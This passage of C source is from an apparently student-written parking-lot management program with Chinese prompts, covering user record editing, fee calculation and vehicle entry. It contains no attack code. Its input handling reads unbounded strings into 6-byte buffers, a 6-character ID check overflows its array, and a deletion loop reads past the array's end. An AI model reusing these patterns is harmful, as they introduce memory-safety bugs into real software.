(strcmp(user[j].carid1,ucid2))==0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf(\"该车已存在!\");\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t}while(!flag);\r\n\r\n\t\tif(flag)\r\n\t\t{\r\n\t\t\tstrcpy(user[i].id,uid);\r\n\t\t\tstrcpy(user[i].carid1,ucid1);\r\n\t\t\tstrcpy(user[i].carid2,ucid2);\r\n\t\t\tdo\r\n\t\t\t{\r\n\t\t\t\tprintf(\"卡类型(year/time):\"); //输入卡类型\r\n\t\t\t\tscanf(\"%s\",tcard);\r\n\r\n\t\t\t\tif((strcmp(tcard,\"year\"))==0) //年卡输入有效期\r\n\t\t\t\t{\r\n\t\t\t\t\tdo \r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\tprintf(\"请输入有效使用期:\");\r\n\t\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\t\tif(strlen(va)!=6)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\t\tv=atol(va);\r\n\t\t\t\t\t\tif(v<=time) //有效期与今日时间对比\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\tuser[i].valid=v;\r\n\t\t\t\t\tstrcpy(user[i].card,\"year\");\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\telse if((strcmp(tcard,\"time\"))==0)\r\n\t\t\t\t{\r\n\t\t\t\t\tdo //次卡输入有效次数\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\tprintf(\"请输入有效次数(一次性输入最大使用次数为30):\");\r\n\t\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\t\t\tv=atoi(va);\r\n\t\t\t\t\t\t\t\tif(v>30 || v<=0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\tuser[i].valid=v;\r\n\t\t\t\t\tstrcpy(user[i].card,\"time\");\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t}while(flag);\r\n\r\n\t\t\tstrcpy(user[i].car1in,\"车辆未进入\");\r\n\t\t\tstrcpy(user[i].car2in,\"车辆未进入\");\r\n\t\t\tif((strcmp(user[i].carid2,\"0\"))==0)\r\n\t\t\t\tstrcpy(user[i].car2in,\"无车辆\");\r\n\t\t\tprintf(\"\\n\");\r\n\t\t};\r\n\t\tcount+=1;\r\n\t};\r\n\tprintf(\"OK!\\n\");\r\n\tm=m+count;\r\n\tsave(m); //保存\r\n\tfclose(fp);\r\n};\r\n\r\nvoid modify() //修改信息函数\r\n{ \r\n\tint q,f,loc=-1,i,k,j,ss,x; //loc代表用户序号\r\n\tint m=load();\r\n\tchar id[6],cid[6];\r\n\tdo\r\n\t{\r\n\t\tf=1;\r\n\t\tprintf(\"按用户id修改请选择1,按车牌修改请选择2,放弃修改选择3:\");\r\n\t\tscanf(\"%d\",&q);\r\n\t\tif(q>=1&&q<=3)\r\n\t\t{\r\n\t\t\tf=1;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tf=0;\r\n\t\t\tprintf(\"无效的选择!\\n\");\r\n\t\t}\r\n\t}while(!f); \r\n\r\n\tswitch(q)\r\n\t{\r\n\tcase 1:\r\n\t\tprintf(\"请输入要修改的用户id:\");\r\n\t\tscanf(\"%s\",id);\r\n\t\tfor(i=0;i<m;i++)\r\n\t\t{\r\n\t\t\tif(strcmp(user[i].id,id)==0) // 先检查是否存在该用户id\r\n\t\t\t{\r\n\t\t\t\tloc=i;\r\n\t\t\t}\r\n\t\t}\r\n\t\tbreak;\r\n\tcase 2:\r\n\t\tprintf(\"请输入要修改信息的用户的车牌号:\");\r\n\t\tscanf(\"%s\",&cid);\r\n\t\tfor(i=0;i<m;i++)\r\n\t\t{\r\n\t\t\tif(strcmp(user[i].carid1,cid)==0 || strcmp(user[i].carid2,cid)==0)\r\n\t\t\t{\r\n\t\t\t\tloc=i;\r\n\t\t\t}\r\n\t\t}\t\t\r\n\tbreak;\r\n\tdefault:break;\r\n\t}\r\n\r\n\tint flag=0,c;\r\n\tchar card[4],t[7],c1id[6],c2id[6],va[6];\r\n\tlong v=0,td;\r\n\r\n\tif(loc==-1){\r\n\t\tprintf(\"该用户不存在!\");\r\n\t}\r\n\telse{ // 输出该用户信息,决定是否要修改\r\n\t\tint n;\r\n\t\tprintf(\"该用户信息为:\\n\");\r\n\t\tprintf(\"\\t%s,\\t%s,\\t%d,\\t%s,\\t%s,\\t%s,\\t%s\\n\",user[loc].id,user[loc].card,user[loc].valid,user[loc].carid1,user[loc].carid2,user[loc].car1in,user[loc].car2in);\r\n\t\tprintf(\"确定修改该用户请选择1,放弃修改请选择0:\");\r\n\t\tscanf(\"%d\",&n);\r\n\t\tif(n==1)\r\n\t\t{\r\n\t\t\tprintf(\"\\n1.id 2.卡类型 3.有效日期/有效时间 4.车牌号\\n\");\r\n\t\t\tdo\r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tprintf(\"请输入您要修改的序号:\");\r\n\t\t\t\tscanf(\"%d\",&c);\r\n\t\t\t\tif(c>4 || c<1)\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=0;\r\n\t\t\t\t\tprintf(\"无效的选择,请重新选择:\");\r\n\t\t\t\t}\r\n\t\t\t}while(!flag);\r\n\t\t}\r\n\t}\r\n\r\n\tif(!flag){return;}\r\n\r\n\tdo\r\n\t{\r\n\t\tswitch(c)\r\n\t\t{\r\n\t\tcase 1:\r\n\t\t\tdo\r\n\t\t\t{\r\n\t\t\t\tflag=1;\r\n\t\t\t\tdo\r\n\t\t\t\t{\r\n\t\t\t\t\tprintf(\"请输入由数字与字母组成的修改后的用户ID:\");\r\n\t\t\t\t\tscanf(\"%s\",&id);\r\n\t\t\t\t\tflag=1;\r\n\t\t\t\t\tif(strlen(id)!=6){flag=0;}\r\n\t\t\t\t\tfor(k=0;id[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\tif(isalnum(id[k])==0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t}while(!flag);\r\n\t\t\t\tfor(j=0;j<m;j++) // 用户id查重\r\n\t\t\t\t{\r\n\t\t\t\t\tif((strcmp(user[j].id,id))==0) \r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprintf(\"该id已存在,请重新输入:\");\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}while(!flag);\r\n\t\t\tstrcpy(user[loc].id,id);\r\n\t\t\tbreak;\r\n\r\n\t\tcase 2:\r\n\t\t\tprintf(\"请输入修改后的卡类型(year/time):\");\r\n\t\t\tscanf(\"%s\",card);\t\r\n\t\t\tif((strcmp(card,\"time\"))==0)\r\n\t\t\t{\r\n\t\t\t\tstrcpy(user[loc].card,card);\r\n\t\t\t\tdo\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=1;\r\n\t\t\t\t\tprintf(\"请输入该卡有效次数:\");\r\n\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++) //判断输入是否为数字,并且大于0,小于30\r\n\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\tv=atoi(va);\r\n\t\t\t\t\t\tif(v>30 || v<=0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t}while(!flag);\r\n\t\t\t\tuser[loc].valid=v;\r\n\t\t\t}\t\r\n\t\t\telse if((strcmp(card,\"year\"))==0)\r\n\t\t\t{\r\n\t\t\t\tstrcpy(user[loc].card,card);\r\n\t\t\t\tdo\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=1;\r\n\t\t\t\t\tprintf(\"请输入今日日期(例190212): \");\r\n\t\t\t\t\tscanf(\"%s\",&t);\r\n\t\t\t\t\tif(strlen(t)!=6) // 判断日期是否为6位,并且是数字\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tfor(k=0;t[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\tif(isdigit(t[k])==0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t}while(!flag);\r\n\t\t\t\ttd=atol(t);\t\r\n\t\t\t\tdo\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=1;\r\n\t\t\t\t\tprintf(\"请输入有效使用期:\");\r\n\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\tif(strlen(va)!=6)\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++) // 有效期必须大于今日日期\r\n\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\tv=atol(va);\r\n\t\t\t\t\t\tif(v<=td)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t}while(!flag);\r\n\t\t\t\tuser[loc].valid=v;\r\n\t\t\t};\r\n\t\t\tbreak;\r\n\r\n\t\tcase 3:\r\n\t\t\tif((strcmp(user[loc].card,\"time\"))==0)\r\n\t\t\t{\r\n\t\t\t\tdo //修改有效次数\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=1;\r\n\t\t\t\t\tprintf(\"请输入该卡有效次数:\");\r\n\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++) \r\n\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\tv=atoi(va);\r\n\t\t\t\t\t\tif(v>30 || v<=0)\r\n\t\t\t\t\t\t\tflag=0;\t\t\r\n\t\t\t\t}while(!flag);\r\n\t\t\t\tuser[loc].valid=v;\r\n\t\t\t}\r\n\t\t\telse if((strcmp(user[loc].card,\"year\"))==0)\r\n\t\t\t{\r\n\t\t\t\tdo //修改有效日期\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=1;\r\n\t\t\t\t\tprintf(\"请输入今日日期(例190212): \");\r\n\t\t\t\t\tscanf(\"%s\",&t);\r\n\t\t\t\t\tif(strlen(t)!=6)\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tfor(k=0;t[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\tif(isdigit(t[k])==0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t}while(!flag);\r\n\t\t\t\ttd=atol(t);\t\r\n\t\t\t\tdo\r\n\t\t\t\t{\r\n\t\t\t\t\tflag=1;\r\n\t\t\t\t\tprintf(\"请输入有效使用期:\");\r\n\t\t\t\t\tscanf(\"%s\",&va);\r\n\t\t\t\t\tif(strlen(va)!=6)\r\n\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tfor(k=0;va[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\tif(isdigit(va[k])==0)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\tif(flag)\r\n\t\t\t\t\t\tv=atol(va);\r\n\t\t\t\t\t\tif(v<=td)\r\n\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t}while(!flag);\r\n\t\t\t\tuser[loc].valid=v;\t\t\r\n\t\t\t};\r\n\t\t\tbreak;\r\n\r\n\t\tcase 4:\r\n\t\t\tif((strcmp(user[loc].carid1,\"0\")!=0) && (strcmp(user[loc].carid2 ,\"0\")!=0)) // 当用户有2辆车\r\n\t\t\t{\r\n\t\t\t\tprintf(\"该用户有2辆车,修改车辆1请按1,修改车辆2请按2,都要修改请按3,放弃修改请按4:\");\r\n\t\t\t\tscanf(\"%d\",&ss);\r\n\t\t\t\tif(ss==1) //修改车1\r\n\t\t\t\t{\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tdo\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\t\tprintf(\"输入由字母与数字组成的修改后的车牌号:\");\r\n\t\t\t\t\t\t\tscanf(\"%s\",&c1id);\t\r\n\t\t\t\t\t\t\tfor(k=0;c1id[k]!='\\0' && flag;k++) // 判断车牌号是否合理\r\n\t\t\t\t\t\t\t\tif(isalnum(c1id[k])==0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\t\tif(strcmp(c1id,\"0\")!=0) // 验证车牌号是否存在\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tfor(j=0;j<m;j++)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tif((strcmp(user[j].carid1,c1id)==0) || (strcmp(user[j].carid2,c1id)==0))\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tprintf(\"该车牌号已存在,\");\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}while(!flag);\t\r\n\t\t\t\t\tif(strcmp(c1id,\"0\")==0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[loc].carid1,user[loc].carid2);\r\n\t\t\t\t\t strcpy(user[loc].carid2,\"0\");\r\n\t\t\t\t\t\tstrcpy(user[loc].car2in,\"无车辆\");\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\tstrcpy(user[loc].carid1,c1id);\r\n\t\t\t\t\t\tprintf(\"修改成功!\");\r\n\t\t\t\t}\r\n\t\t\t\telse if(ss==2) // 修改车2\r\n\t\t\t\t{\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tdo\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\t\tprintf(\"请输入由字母与数字组成的修改后车辆2的车牌号:\");\r\n\t\t\t\t\t\t\tscanf(\"%s\",c2id);\r\n\t\t\t\t\t\t\tfor(k=0;c2id[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\t\t\tif(isalnum(c2id[k])==0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\t\tif(strcmp(c2id,\"0\")!=0)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tfor(j=0;j<m;j++)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tif((strcmp(user[j].carid1,c2id)==0) || (strcmp(user[j].carid2,c2id)==0))\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tprintf(\"该车牌号已存在,\");\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t};\r\n\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\tif(strcmp(c2id,\"0\")==0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[loc].carid2,c2id);\r\n\t\t\t\t\t\tstrcpy(user[loc].car2in,\"无车辆\");\r\n\t\t\t\t\t};\r\n\t\t\t\t\tstrcpy(user[loc].carid2,c2id);\r\n\t\t\t\t\tprintf(\"修改成功!\");\r\n\t\t\t\t}\r\n\t\t\t\telse if(ss==3) //全修改\r\n\t\t\t\t{\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tdo\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\t\tprintf(\"输入由字母与数字组成的修改后的车牌号1:\");\r\n\t\t\t\t\t\t\tscanf(\"%s\",&c1id);\t\r\n\t\t\t\t\t\t\tfor(k=0;c1id[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\t\t\tif(isalnum(c1id[k])==0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\tif(strcmp(c1id,\"0\")==0)\r\n\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\t\tif(strcmp(c1id,\"0\")!=0)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tfor(j=0;j<m;j++)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tif((strcmp(user[j].carid1,c1id)==0) || (strcmp(user[j].carid2,c1id)==0))\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tprintf(\"该车牌号已存在,\");\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t};\r\n\t\t\t\t\t\t};\r\n\t\t\t\t\t}while(!flag);\t\t\t\t\r\n\t\t\t\t\tstrcpy(user[loc].carid1,c1id);\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tdo\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\t\tprintf(\"请输入由字母与数字组成的修改后车辆2的车牌号:\");\r\n\t\t\t\t\t\t\tscanf(\"%s\",c2id);\r\n\t\t\t\t\t\t\tfor(k=0;c2id[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\t\t\tif(isalnum(c2id[k])==0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t}while(!flag);\r\n\r\n\t\t\t\t\t\tif(strcmp(c2id,\"0\")!=0)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tfor(j=0;j<m;j++)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tif((strcmp(user[j].carid1,c1id)==0) || (strcmp(user[j].carid2,c1id)==0))\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tprintf(\"该车牌号已存在,\");\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\tif(strcmp(c2id,\"0\")==0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tstrcpy(user[loc].carid2,c2id);\r\n\t\t\t\t\t\tstrcpy(user[loc].car2in,\"无车辆\");\r\n\t\t\t\t\t};\r\n\t\t\t\t\tstrcpy(user[loc].carid2,c2id);\r\n\t\t\t\t\tprintf(\"修改成功!\");\r\n\t\t\t\t}\r\n\t\t\t\t//else\r\n\t\t\t\t//\tbreak;\r\n\t\t\t}\r\n\r\n\t\t\telse if((strcmp(user[loc].carid1 ,\"0\")!=0) && (strcmp(user[loc].carid2,\"0\")==0)) // 若用户仅拥有一辆车\r\n\t\t\t{\r\n\t\t\t\tprintf(\"该用户有一台车,确认修改请按1,添加车辆请按2,取消修改请按0: \");\r\n\t\t\t\tscanf(\"%d\",&ss);\r\n\t\t\t\tif(ss==1) // 修改车辆1\r\n\t\t\t\t{\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tdo\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\t\tprintf(\"输入由字母与数字组成的修改后的车牌号:\");\r\n\t\t\t\t\t\t\tscanf(\"%s\",&c1id);\t\r\n\t\t\t\t\t\t\tfor(k=0;c1id[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\t\t\tif(isalnum(c1id[k])==0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\tif(strcmp(c1id,\"0\")==0)\r\n\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\t\tfor(j=0;j<m;j++)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tif((strcmp(user[j].carid1,c1id)==0) || (strcmp(user[j].carid2,c1id)==0))\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tprintf(\"该车牌号已存在,\");\r\n\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}while(!flag);\t\t\t\t\t\t\t\r\n\t\t\t\t\tstrcpy(user[loc].carid1,c1id);\r\n\t\t\t\t\tprintf(\"修改成功!\");\r\n\t\t\t\t}\r\n\t\t\t\telse if(ss==2) //添加车辆2\r\n\t\t\t\t{\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tflag=1;\r\n\t\t\t\t\t\tdo\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tprintf(\"输入由字母与数字组成的车牌号:\");\r\n\t\t\t\t\t\t\tscanf(\"%s\",&c2id);\r\n\t\t\t\t\t\t\tfor(k=0;c2id[k]!='\\0' && flag;k++)\r\n\t\t\t\t\t\t\t\tif(isalnum(c2id[k])==0)\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\t\tfor(j=0;j<m;j++)\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tif((strcmp(user[j].carid1,c2id)==0) || (strcmp(user[j].carid2,c2id)==0))\r\n\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\tprintf(\"该车牌号已存在,\");\r\n\t\t\t\t\t\t\t\t\tflag=0;\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t}while(!flag);\r\n\t\t\t\t\tstrcpy(user[loc].carid2,c2id);\r\n\t\t\t\t\tstrcpy(user[loc].car2in,\"车辆未进入\");\r\n\t\t\t\t\tprintf(\"修改成功!\");\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\tprintf(\"\\n\");\r\n\t\tprintf(\"确定保存修改的信息(1/0),如选0,则重新修改?\");\r\n\t\tscanf(\"%d\",&flag);\r\n\t}while(!flag);\r\n\r\n\tsave(m);\r\n\tdisplay();\r\n\tprintf(\"\\n修改结束请按0,继续修改请按1:\"); //如果继续修改,清空桌面,重新运行一次\r\n\tscanf(\"%d\",&x);\r\n\tswitch(x)\r\n\t{\r\n\tcase 0:\r\n\t\tsystem(\"cls\");\r\n\t\tbreak;\r\n\tcase 1:\r\n\t\tmodify();\r\n\t\tbreak;\r\n\tdefault:system(\"cls\");break;\r\n\t}\r\n}\r\n\r\nbool isleap(int year){ // 判断是否为闰年\r\n\t return (year%4==0 && year%100!=0 || year%400==0);\r\n}\r\n\r\n//计算停车费用\r\nlong fee(long Time_in,long Hour_in,long Time_out,long Hour_out)\r\n{\r\n\t//导入进出时间后,将其分解为年,月,日,时,分\r\n int y1,m1,d1,h1,s1;\r\n int y2,m2,d2,h2,s2;\r\n int day=0;\r\n long hour,p;\r\n y1=Time_in/10000,m1=Time_in%10000/100,d1=Time_in%100,h1=Hour_in/100,s1=Hour_in%100;\r\n y2=Time_out/10000,m2=Time_out%10000/100,d2=Time_out%100,h2=Hour_out/100,s2=Hour_out%100;\r\n while (y1<y2 || m1<m2 || d1<d2){ //计算进出时间相差多少天\r\n d1++;\r\n if (d1==month[m1][isleap(y1)]+1){\r\n m1++;\r\n d1=1;\r\n }\r\n if(m1==13){\r\n y1++;\r\n m1=1;\r\n }\r\n day++;\r\n };\r\n hour=h2-h1; // 计算小时差\r\n if(s2-s1>0)\r\n hour++;\r\n\thour=hour+24*day;\r\n p=5+3*(hour-1); // 计算费用\r\n return p;\r\n};\r\n\r\nvoid carin(){\r\n\tFILE* fp;\r\n\tint m=load();\r\n\tint i,n,j,k=0,flag,tag,loc=-1,f; //tag代表车1还是车2\r\n\tbool ft=true;\r\n\tchar car[6],time[12],tim[6];\r\n\tchar sto[7];\r\n\tlong v;\r\n\tdo\r\n\t{\r\n\t\tflag=1;\r\n\t\tprintf(\"请输入车牌号:\"); // 确定车牌号\r\n\t\tscanf(\"%s\",car);\r\n\t\tfor(i=0;car[i]!='\\0' && flag;i++)\r\n\t\t{\r\n\t\t\tif(isalnum(car[i])==0)\r\n\t\t\t\tflag=0;\r\n\t\t}\r\n\t}while(!flag);\r\n\tstrcpy(sto,car);\r\n\r\n\tfor(i=0;i<m;i++)\t\t\t\t\t\t\t\t\t\t//检索该车牌的车主,确定进入的车辆是车1还是车2\r\n\t{\r\n\t\tif(strcmp(user[i].carid1,sto)==0)\r\n\t\t{\r\n\t\t\ttag=1;\r\n\t\t\tloc=i;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t\telse if(strcmp(user[i].carid2,sto)==0)\r\n\t\t{\r\n\t\t\ttag=2;\r\n\t\t\tloc=i;\r\n\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\r\n\tdo\r\n\t{\r\n\t\tflag=1;\r\n\t\tprintf(\"请输入入场时间(省略':'精确到分):\"); // 输入进入时间\r\n\t\tscanf(\"%s\",time);\r\n\t\tif(strlen(time)!=12)\r\n\t\t\tflag=0;\r\n\t\tfor(i=0;time[i]!='\\0' && flag;i++)\r\n\t\t{\r\n\t\t\tif(isdigit(time[i])==0)\r\n\t\t\t\tflag=0;\r\n\t\t}\r\n\t}while(!flag);\r\n\r\n\tif(loc!=-1){ //loc为该用户在数组中的位置\r\n\t\tif(strcmp(user[loc].card,\"year\")==0)\r\n\t\t{\r\n\t\t\tstrncpy(tim,time+2,6);\r\n\t\t\tv=atol(tim);\r\n\t\t\tif(v>=user[loc].valid){ft=false;} \r\n\t\t};\r\n\r\n\t\tif(ft){ // ft是true代表会员没到期\r\n\t\t\tif(tag==1) //tag代表等待进入的是车主的几号车\r\n\t\t\t{\r\n\t\t\t\tif(strcmp(user[loc].car2in,\"vip\")==0)\r\n\t\t\t\t\tstrcpy(user[loc].car1in,time);\r\n\t\t\t\telse if(strcmp(user[loc].car2in,\"无车辆\")==0 || strcmp(user[loc].car2in,\"车辆未进入\")==0)\r\n\t\t\t\t\tstrcpy(user[loc].car1in,\"vip\");\r\n\t\t\t}\r\n\t\t\telse if(tag==2)\r\n\t\t\t{\r\n\t\t\t\tif(strcmp(user[loc].car1in,\"vip\")==0)\r\n\t\t\t\t\tstrcpy(user[loc].car2in,time);\r\n\t\t\t\telse if(strcmp(user[loc].car1in,\"无车辆\")==0 || strcmp(user[loc].car1in,\"车辆未进入\")==0)\r\n\t\t\t\t\tstrcpy(user[loc].car2in,\"vip\");\r\n\t\t\t};\r\n\t\t\tsave(m);\r\n\t\t\tprintf(\"请进入!\");\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tfor(j=loc;j<m;j++) //删除过期用户\r\n\t\t\t{\r\n\t\t\t\tstrcpy(user[j].id,user[j+1].id);\r\n\t\t\t\tuser[j].valid=user[j+1].valid;\r\n\t\t\t\tstrcpy(user[j].card,user[j+1].card);\r\n\t\t\t\tstrcpy(user[j].carid1,user[j+1].carid1);\r\n\t\t\t\tstrcpy(user[j].carid2,user[j+1].carid2);\r\n\t\t\t\tstrcpy(user[j].car1in,user[j+1].car1in);\r\n\t\t\t\tstrcpy(user[j].car2in,user[j+1].car2in);\r\n\t\t\t};\r\n\t\t\tm=m-1;\r\n\t\t\tsave(m);\r\n\t\t\tloc=-1;\r\n\t\t\tprintf(\"您的用户卡因逾期未续费,已被注销。请办理临时卡进入.\\n\");\t\t\t\r\n\t\t}\r\n\t}\r\n\tif(!isFull() && loc==-1){\r\n\t\tprintf(\"办理临时卡请选择1,离开请选择0: \");\r\n\t\tscanf(\"%d\",&n);\r\n\t\tif(n==1)\r\n\t\t{ //临时卡只设置车牌号与进入时间,其余全为默认值\r\n\t\t\tstrcpy(user[m].id,\"temp\"); \r\n\t\t\tstrcpy(user[m].card,\"temp\");\r\n\t\t\tstrcpy(user[m].carid2,\"0\");\r\n\t\t\tstrcpy(user[m].car1in,time);\r\n\t\t\tstrcpy(user[m].car2in,\"无车辆\");\r\n\t\t\tstrcpy(user[m].carid1,sto);\r\n\t\t\tm=m+1;\r\n\t\t\tsave(m);\r\n\t\t\tprintf(\"\\n添加成功!\\n\");\r\n\t\t\tprintf(\"您可以进入!\");\r\n\t\t}\r\n\t\telse\r\n\t\t\tprintf(\"再见!\");\r\n\t}\r\n\telse if(isFull()){printf(\"用户已满!不能创建临时卡。\");}\r\n};\r\n\r\nvoid carout(){\r\n\tFILE* fp;\r\n int m=load();\r\n int i,j,flag,tag=0,hoursout,hoursin;\r\n 